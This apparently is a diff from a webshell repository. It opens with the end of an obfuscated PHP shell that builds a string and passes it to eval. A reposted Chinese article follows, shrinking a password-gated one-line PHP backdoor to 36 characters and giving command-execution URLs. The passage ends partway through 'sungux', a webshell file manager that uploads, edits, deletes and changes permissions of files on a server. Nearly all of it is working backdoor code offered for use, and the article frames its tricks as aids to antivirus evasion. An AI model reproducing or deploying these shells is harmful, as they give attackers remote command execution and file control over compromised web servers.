+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[65] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[39];
+    $<24><><EFBFBD><EFBFBD><EFBFBD>口<EFBFBD><E58FA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>夏<EFBFBD><E5A48F><EFBFBD><EFBFBD><EFBFBD>玶<EFBFBD>䬅<EFBFBD><E4AC85><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[9] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[53] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[19] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[69] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[42] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[16] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[25] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[19] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[71];
+    $<24><>邜<EFBFBD><E9829C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>巖<EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[15] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[53] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[8] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[69] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[25] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[3] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[39] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[65] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[39];
+    $<24><><EFBFBD>牂<EFBFBD><E78982><EFBFBD><EFBFBD><EFBFBD><EFBFBD>殻<EFBFBD><E6AEBB><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[20] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[65] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[18] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[8] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[0] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[29] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[37] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[19] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63];
+    $<24><><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD>兰<EFBFBD><E585B0><EFBFBD><EFBFBD>最<EFBFBD><E69C80>䘟<EFBFBD><E4989F>谯<EFBFBD><E8B0AF><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[29] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[56] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[23] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[80] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[63] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[47] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[60] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[54] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[74] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[40];
+    $<24><>嬉<EFBFBD><E5AC89><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>稬熺<E7A8AC><E786BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>剤<EFBFBD>磺嬋儴<E5AC8B>叙<EFBFBD><E58F99>躺<EFBFBD><E8BABA><EFBFBD><EFBFBD><EFBFBD> .
+        $<24><><EFBFBD><EFBFBD>箮<EFBFBD><E7AEAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .
+        $<24><>邜<EFBFBD><E9829C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>巖<EFBFBD> .
+        $<24><><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD>兰<EFBFBD><E585B0><EFBFBD><EFBFBD>最<EFBFBD><E69C80>䘟<EFBFBD><E4989F>谯<EFBFBD><E8B0AF><EFBFBD> .
+        $<24><><EFBFBD><EFBFBD><EFBFBD>口<EFBFBD><E58FA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>夏<EFBFBD><E5A48F><EFBFBD><EFBFBD><EFBFBD>玶<EFBFBD>䬅<EFBFBD><E4AC85><EFBFBD> .
+        $<24><><EFBFBD>牂<EFBFBD><E78982><EFBFBD><EFBFBD><EFBFBD><EFBFBD>殻<EFBFBD><E6AEBB><EFBFBD> .
+        '$<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>朙趣<E69C99>䉆<EFBFBD><E48986><EFBFBD><EFBFBD>机<EFBFBD><E69CBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>' .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[41] .
+        $<24><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>蔂<EFBFBD><E89482><EFBFBD>禷<EFBFBD>[83];
+    return EvAl($<24><>嬉<EFBFBD><E5AC89><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>基<EFBFBD><E59FBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>稬熺<E7A8AC><E786BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>);
+} ?>

php/一句话木马的精简史.md

@@ -0,0 +1,126 @@
+# 一句话木马的精简史
+=========
+
+原创 lwjs [信安之路](javascript:void(0);)
+
+**信安之路** 
+
+微信号 xazlsec
+
+功能介绍 坚持原创，专注信息安全技术和经验的分享，致力于帮助十万初学者入门信息安全行业，为信息安全事业奋斗终身。
+
+_2022-08-25 09:52_ _发表于山西_
+
+收录于合集
+
+今天来看看如何精简一个 php 后门，基于 php 的特性，让 php 后门的字节最小化，首先编写一个一句话后门：
+
+```php
+<?php
+    $function = $_GET['function'];
+    $argument = $_GET['argument'];
+    $function($argument)
+?>
+```
+
+使用方式（function 参数是要执行的函数名，比如 exec、eval、system 等执行命令的函数，argument 为函数的参数，根据不同的函数，使用的参数不同）：
+
+> http://example.com/shell.php?function=system&argument=pwd
+
+![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfdyKfVllkibgjOuUOzCo3Bs8oDA0LJdT31XSYxZpJiczg8UpyVRHrUWFXFmibbichc2DybyR7xdg6Cs3Q/640?wx_fmt=png)
+
+目前该 webshell 的大小为 98 字节：
+
+![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfdyKfVllkibgjOuUOzCo3Bs8jf9U1R6J6UHu4pDmMkM1Yz3vLliaeH8zmDwqJO2a30KRemicViby9xAOw/640?wx_fmt=png)
+
+我们看到 shell 中的变量名和参数名都比较长，直接可以缩减为一个字符，比如：
+
+```php
+<?php
+    $f = $_GET['f'];
+    $a = $_GET['a'];
+    $f($a)
+?>
+```
+
+对于 PHP 来说，结束标签 `?>` 也可以不要，然后将变量名也缩减掉之后变成：
+
+```php
+<?php
+    $_GET['f']($_GET['a']);
+```
+
+当前脚本的大小已经缩减到了 34 个字符，测试下是否可用：
+
+> http://example.com/shell.php?f=system&a=pwd
+
+![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfdyKfVllkibgjOuUOzCo3Bs8RP9mQbba1gyH47sx6QLs4mzHjIMZ2dXAZ67R9AYANWs41LsYu9CVibw/640?wx_fmt=png)
+
+现在有个问题，没有设置密码，任何人都可以使用这个 shell，现在需要增加一个访问密码：
+
+```php
+<?php
+  if ($_GET['p']=='password'){
+    $_GET['f']($_GET['a']);
+  }
+```
+
+使用时在参数中增加 `p=password` 即可：
+
+> http://example.com/shell3.php?f=system&a=pwd&p=password
+
+![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfdyKfVllkibgjOuUOzCo3Bs8av3mmVOyyDRNTZxX5icTSfJ381qLZsMlxFBYQXibJGF16ZXGcz55TEibw/640?wx_fmt=png)
+
+增加了密码功能之后，后门大小变成了 64 字节，还能再进行缩减吗？
+
+对于 php 而言，存在一种叫三元运算符的东西，比如正常写 `if else`:
+
+> if ($movie == ‘marvel’){echo ‘y’} else{‘n’}
+
+使用三元运算符之后的写法：
+
+> ($movie == ‘marvel’ ? echo ‘y’ : echo ‘n’)
+
+应用到我们的 shell 中，变成了：
+
+```php
+<?php
+    ($_GET['p']=='password')?$_GET['f']($_GET['a']):y);
+```
+
+然后密码可以设置短点，比如 `_`，然后将换行符等空白符尽可能去掉：
+
+```php
+<?php ($_GET['p']=='_'?$_GET['f']($_GET['a']):y);
+```
+
+当前字节数只剩下了 50 个，我们还可以利用 && 先执行密码验证后执行命令的方式，如果密码验证失败这该脚本执行结束，最后变为：
+
+```php
+<?php $_GET['p']=='_'&&$_GET['f']($_GET['a']);
+```
+
+现在这个 shell 字节已经缩减到 47 个，php 还有一个特性 `<?php` 与 `<?=` 等价，又可用缩减两个字节：
+
+```php
+<?=$_GET['p']=='_'&&$_GET['f']($_GET['a']);
+```
+
+最后，php 允许 `$_GET[f]` 这样的写法， 所以我们可以将 shell 中的单引号都去掉，又能减少 8 个字符：
+
+```php
+<?=$_GET[p]==_&&$_GET[f]($_GET[a]);
+```
+
+![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfdyKfVllkibgjOuUOzCo3Bs8acbb9vicUUYGejRmCvhHBYIyATu6ttOVZeVYRrRYpXhauHxOCR6qDJg/640?wx_fmt=png)
+
+缩减到最后的 shell 只有 36 个字符，测试下是否可以正常使用：
+
+> http://example.com/shell7php?f=system&a=whoami&p=\_
+
+![](https://mmbiz.qpic.cn/mmbiz_png/sGfPWsuKAfdyKfVllkibgjOuUOzCo3Bs8vNoKzO4hzePU4tkXBtXuH0EQITaBgTrbibEmXBCPsvrQOoxWgNp9iaPg/640?wx_fmt=png)
+
+经过一系列的操作，webshell 获得了极大的缩减，其中包含了多个 PHP 脚本的特性，这些特性对于后续的 webshel 免杀会有极大的帮助，极具学习的价值。
+
+
+

upsi1on/webshell/sungux/decrypt.php

@@ -0,0 +1,745 @@
+<?php
+error_reporting(0);
+echo "
+<style>
+    body {
+        color: Gray;
+        background: #353535;
+        font-weight: Bold;
+        font-family: Arial;
+        font-size: 14px;
+    }
+
+    input[id=one] {
+        background: Transparent;
+        color: Gray;
+        font-weight: Bold;
+        border: #353535 1px solid;
+    }
+
+    input[id=textinput] {
+        border: 1px #353535 solid;
+        background: #353535;
+        color: Gray;
+        font-weight: Bold;
+        width: 50%;
+    }
+
+    input[type=submit] {
+        background: Transparent;
+        color: Gray;
+        font-weight: Bold;
+        border: #353535 1px solid;
+    }
+
+    input[type=file] , [id=three] {
+        width: 30%;
+        border: 1px Gray solid;
+        border-radius: 10px;
+        background: #353535;
+        color: Gray;
+    }
+
+    input[id=two] {
+        margin-left: 70px;
+    }
+
+    a {
+        text-decoration: none;
+        color: Gray;
+    }
+
+    table {
+        font-weight: Bold;
+    }
+
+    textarea {
+        width: 90%;
+        height: 50%;
+    }
+
+    .iclass {
+        margin-left: 40px;
+    }
+</style>
+
+";
+
+if (isset($_POST["phpinfo"])) {
+    echo "<a href='?path=".$_GET["path"]."'>back</a>";
+    phpinfo();
+    exit;
+}
+
+echo "<pre><center>
+.d8888b  888  888 88888b.   .d88b.  888  888 888  888
+88K      888  888 888 '88b d88P'88b 888  888 `Y8bd8P'
+'Y8888b. 888  888 888  888 888  888 888  888   X88K  
+     X88 Y88b 888 888  888 Y88b 888 Y88b 888 .d8''8b.
+d88888P'  'Y88888 888  888  'Y88888  'Y88888 888  888
+                                888                  
+                           Y8b d88P                  
+                            'Y88P'                   
+</center></pre>";
+
+$path = base64_decode($_GET["path"]);
+
+if (is_dir($path)) {
+    if ($path !== "/") {
+        $slash = "/";
+    } else {
+        $slash = "";
+    }
+} else {
+    $checkslash = substr($path, 2);
+    if (is_dir($checkslash)) {
+        if ($checkslash !== "/") {
+            $slash = "/";
+        } else {
+            $slash = "";
+        }
+    } else {
+        if (is_file($checkslash)) {
+            if ($checkslash !== "/") {
+                $slash = "/";
+            } else {
+                $slash = "";
+            }
+        }
+    }
+}
+
+if (!is_dir($path)) {
+    if (substr($path, 0, 2) == "#E") {
+        if (!is_file(substr($path, 2))) {
+            header("Location: ?path=".base64_encode(__DIR__)."");
+        }
+    } else {
+        if (substr($path, 0, 2) == "#R") {
+            if (!is_file(substr($path, 2))) {
+                if (!is_dir(substr($path, 2))) {
+                    header("Location: ?path=".base64_encode(__DIR__)."");
+                }
+            }
+        } else {
+            if (substr($path, 0, 2) == "#D") {
+                if (!is_file(substr($path, 2))) {
+                    if (!is_dir(substr($path, 2))) {
+                        header("Location: ?path=".base64_encode(__DIR__)."");
+                    }
+                }
+            } else {
+                if (substr($path, 0, 2) == "#C") {
+                    if (!is_file(substr($path, 2))) {
+                        if (!is_dir(substr($path, 2))) {
+                            header("Location: ?path=".base64_encode(__DIR__)."");
+                        }
+                    }
+                } else {
+		    header("Location: ?path=".base64_encode(__DIR__)."");
+		}
+            }
+        }
+    }
+}
+echo "<form action='' method='post' enctype='multipart/form-data'>";
+
+if (isset($_POST["move_upload"])) {
+    if (strpos($_POST["uptopath"], "..") !== FALSE) {
+        echo "
+        <script>
+        alert('failed');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    }
+    $fileName = $_FILES["file"]["name"];
+    $tmpName = $_FILES["file"]["tmp_name"];
+    $upload = $_POST["uptopath"].$slash.$fileName;
+    if (is_file($upload)) {
+        echo "
+        <script>
+        alert('file name already exists');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    } else {
+        if (move_uploaded_file($tmpName, $upload)) {
+            echo "
+            <script>
+            alert('successfully');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        } else {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        }
+    }
+}
+
+if (isset($_POST["crf"])) {
+    if (is_dir($_POST["pathfolder"])) {
+        if (strpos($_POST["pathfolder"], "..") !== FALSE) {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        }
+        if (strpos($_POST["foldername"], "/") !== FALSE) {
+            echo "
+            <script>
+            alert('use a different name');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        } else {
+            $o2 = explode("/", $_POST["pathfolder"]);
+            $o2 = implode("/", $o2);
+            $o2 = $o2.$slash.$_POST["foldername"];
+            if (!is_dir($o2)) {
+                if (mkdir($o2)) {
+                    echo "
+                    <script>
+                    alert('successfully');
+                    document.location.href = '?path=".$_GET["path"]."';
+                    </script>
+                    ";
+                } else {
+                    echo "
+                    <script>
+                    alert('failed');
+                    document.location.href = '?path=".$_GET["path"]."';
+                    </script>
+                    ";
+                }
+            } else {
+                echo "
+                <script>
+                alert('folder name alredy exists');
+                document.location.href = '?path=".$_GET["path"]."';
+                </script>
+                ";
+            }
+        }
+    } else {
+        echo "
+        <script>
+        alert('directory not found');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    }
+}
+
+if (isset($_POST["crfl"])) {
+    if (strpos($_POST["pathfile"], "..") == FALSE) {
+        if (is_dir($_POST["pathfile"])) {
+            $slashcheck = explode("/", $_POST["pathfile"]);
+            $slashcheck = implode("/", $slashcheck).$slash;
+            if (strpos($_POST["filename"], "/") == FALSE) {
+                $filePath9 = $slashcheck.$_POST["filename"];
+                if (!is_file($filePath9)) {
+                    $createFile = fopen($filePath9, "x");
+                    if ($createFile) {
+                        echo "
+                        <script>
+                        alert('successfully');
+                        document.location.href = '?path=".$_GET["path"]."';
+                        </script>
+                        ";
+                    } else {
+                        echo "
+                        <script>
+                        alert('failed');
+                        document.location.href = '?path=".$_GET["path"]."';
+                        </script>
+                        ";
+                    }
+                } else {
+                    echo "
+                    <script>
+                    alert('file name already exists');
+                    document.location.href = '?path=".$_GET["path"]."';
+                    </script>
+                    ";
+                }
+            } else {
+                echo "
+                <script>
+                alert('use a different name');
+                document.location.href = '?path=".$_GET["path"]."';
+                </script>
+                ";
+            }
+        } else {
+            echo "
+            <script>
+            alert('directory not found');
+            document.location.href = '?path=".$_GET["path"]."';
+            </script>
+            ";
+        }
+    } else {
+        echo "
+        <script>
+        alert('failed');
+        document.location.href = '?path=".$_GET["path"]."';
+        </script>
+        ";
+    }
+}
+
+if (substr($path, 0, 2) == "#E") {
+    echo "<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 80%;'><hr color='Gray'><center>";
+    $back = dirname(substr($path, 2));
+    if (isset($_POST["save_edit"])) {
+        $delta = substr($path, 2);
+        $editz = fopen($delta, "w");
+        if (fwrite($editz, $_POST["edit_data"])) {
+            echo "
+            <script>
+            alert('successfully');
+            document.location.href = '?path=".base64_encode($back)."';
+            </script>
+            "; fclose($editz);
+        } else {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".base64_encode($back)."';
+            </script>
+            "; fclose($editz);
+        }
+    }
+    if (filesize(substr($path, 2)) == 0) {
+        echo "
+        <textarea name='edit_data'></textarea><hr color='Gray'><a href='?path=".base64_encode($back)."'>cancel</a>
+        <input type='submit' name='save_edit' value='save' id='two'>
+        ";
+    } else {
+        $textareaValue = fopen(substr($path, 2), "r");
+        $textareaValue = fread($textareaValue, filesize(substr($path, 2)));
+        $textareaValue = htmlspecialchars($textareaValue);
+        echo "
+        <textarea name='edit_data'>".$textareaValue."</textarea>
+        <hr color='Gray'><a href='?path=".base64_encode($back)."'>cancel</a><input type='submit' name='save_edit' value='save' id='two'>
+        ";
+        fclose($textareaValue);
+    }
+    exit;
+}
+
+if (substr($path, 0, 2) == "#R") {
+    echo "<input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 80%;'>";
+    $delta = substr($path, 2);
+    $back = dirname($delta);
+    if (isset($_POST["submit_rename"])) {
+        $alphacheck = dirname($delta).$slash.$_POST["rename"];
+        if (!is_dir($alphacheck)) {
+            if (!is_file($alphacheck)) {
+                if (rename($delta, $alphacheck)) {
+                    echo "
+                    <script>
+                    alert('successfully');
+                    document.location.href = '?path=".base64_encode($back)."';
+                    </script>
+                    ";
+                } else {
+                    echo "
+                    <script>
+                    alert('failed');
+                    document.location.href = '?path=".base64_encode($back)."';
+                    </script>
+                    ";
+                }
+            } else {
+                echo "
+                <script>
+                alert('file name alredy exists');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            }
+        } else {
+            echo "
+            <script>
+            alert('folder name alredy exists');
+            document.location.href = '?path=".base64_encode($back)."';
+            </script>
+            ";
+        }
+    }
+    echo "
+    <input type='text' id='three' autocomplete='off' name='rename' value='".basename($delta)."'><hr color='Gray'><center>
+    <a href='?path=".base64_encode($back)."'>cancel</a><input type='submit' name='submit_rename' value='rename' id='two'>
+    ";
+    exit;
+}
+
+if (substr($path, 0, 2) == "#D") {
+    $delta = substr($path, 2);
+    $back = dirname($delta);
+
+    if (isset($_POST["submit_delete"])) {
+        if (is_dir($delta)) {
+            if (rmdir($delta)) {
+                echo "
+                <script>
+                alert('successfully');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            } else {
+                echo "
+                <script>
+                alert('failed');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            }
+        } else {
+            if (unlink($delta)) {
+                echo "
+                <script>
+                alert('successfully');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            } else {
+                echo "
+                <script>
+                alert('failed');
+                document.location.href = '?path=".base64_encode($back)."';
+                </script>
+                ";
+            }
+        }
+    }
+
+    if (is_dir($delta)) {
+        $cat = "folder";
+    } else {
+        $cat = "file";
+    }
+    echo "path : <input type='text' readonly='readonly' value='".$delta."' id='one' style='width: 80%;'><br>
+    name : <input type='text' readonly='readonly' value='".basename($delta)."' id='one' style='width: 80%;'><br>
+    are you sure to permanently delete this ".$cat."?<hr color='Gray'><center>
+    <a href='?path=".base64_encode($back)."'>no</a><input type='submit' name='submit_delete' value='yes' id='two'>
+    ";
+    exit;
+}
+
+if (substr($path, 0, 2) == "#C") {
+
+    $home = dirname(substr($path, 2)); $home = base64_encode($home);
+    $perms = substr(sprintf('%o',fileperms(substr($path, 2))),-3);
+
+    $chv = fileperms(substr($path, 2));
+    $a = ($chv & 00400) ? ' checked' : '';
+    $b = ($chv & 00040) ? ' checked' : '';
+    $c = ($chv & 00004) ? ' checked' : '';
+    $d = ($chv & 00200) ? ' checked' : '';
+    $e = ($chv & 00020) ? ' checked' : '';
+    $f = ($chv & 00002) ? ' checked' : '';
+    $g = ($chv & 00100) ? ' checked' : '';
+    $h = ($chv & 00010) ? ' checked' : '';
+    $i = ($chv & 00001) ? ' checked' : '';
+
+    if (isset($_POST["submit_chmod"])) {
+        $chmode = 0;
+        if (!empty($_POST['ra'])) {
+            $chmode |= 0400;
+        }
+        if (!empty($_POST['wa'])) {
+            $chmode |= 0200;
+        }
+        if (!empty($_POST['ea'])) {
+            $chmode |= 0100;
+        }
+        if (!empty($_POST['rb'])) {
+            $chmode |= 0040;
+        }
+        if (!empty($_POST['wb'])) {
+            $chmode |= 0020;
+        }
+        if (!empty($_POST['eb'])) {
+            $chmode |= 0010;
+        }
+        if (!empty($_POST['rc'])) {
+            $chmode |= 0004;
+        }
+        if (!empty($_POST['wc'])) {
+            $chmode |= 0002;
+        }
+        if (!empty($_POST['ec'])) {
+            $chmode |= 0001;
+        }
+        if (chmod(substr($path, 2), $chmode)) {
+            echo "
+            <script>
+            alert('successfully');
+            document.location.href = '?path=".$home."';
+            </script>
+            ";
+        } else {
+            echo "
+            <script>
+            alert('failed');
+            document.location.href = '?path=".$home."';
+            </script>
+            ";
+        }
+    }
+
+    echo "
+        <hr color='Gray'><form action='' method='post'>
+        <input type='text' readonly='readonly' value='".substr($path, 2)."' id='one' style='width: 100%'>
+        <hr color='Gray'>
+        <table width='100%'>
+            <tr>
+                <th class='chmodd'>Permissions</th>
+                <th class='chmodd'>Owner</th>
+                <th class='chmodd'>Group</th>
+                <th class='chmodd'>Other</th>
+            </tr>
+            <tr>
+                <td>Read</td>
+                <td><center><input type='checkbox' name='ra' value='1' ".$a."></center></td>
+                <td><center><input type='checkbox' name='rb' value='1' ".$b."></center></td>
+                <td><center><input type='checkbox' name='rc' value='1' ".$c."></center></td>
+            </tr>
+            <tr>
+                <td>Write</td>
+                <td><center><input type='checkbox' name='wa' value='1' ".$d."></center></td>
+                <td><center><input type='checkbox' name='wb' value='1' ".$e."></center></td>
+                <td><center><input type='checkbox' name='wc' value='1' ".$f."></center></td>
+            </tr>
+            <tr>
+                <td>Execute</td>
+                <td><center><input type='checkbox' name='ea' value='1' ".$g."></center></td>
+                <td><center><input type='checkbox' name='eb' value='1' ".$h."></center></td>
+                <td><center><input type='checkbox' name='ec' value='1' ".$i."></center></td>
+            </tr>
+        </table><hr color='Gray'>
+        <center><a href='?path=".$home."'>cancel</a>
+        <input type='submit' name='submit_chmod' value='change' id='two'></center>
+    "; exit;
+}
+
+if (isset($_POST["upload"])) {
+    echo "
+    upload to : <input type='text' autocomplete='off' id='textinput' name='uptopath' value='".$path.$slash."' width='100px'><br>
+    <input type='file' name='file'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
+    <input type='submit' name='move_upload' value='upload' id='two'>
+    "; exit;
+}
+
+if (isset($_POST["create_folder"])) {
+    echo "
+    create on : <input type='text' autocomplete='off' id='textinput' name='pathfolder' value='".$path.$slash."' width='100px'><br>
+    <input type='text' autocomplete='off' name='foldername' id='three' placeholder='folder name'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
+    <input type='submit' name='crf' value='create' id='two'>
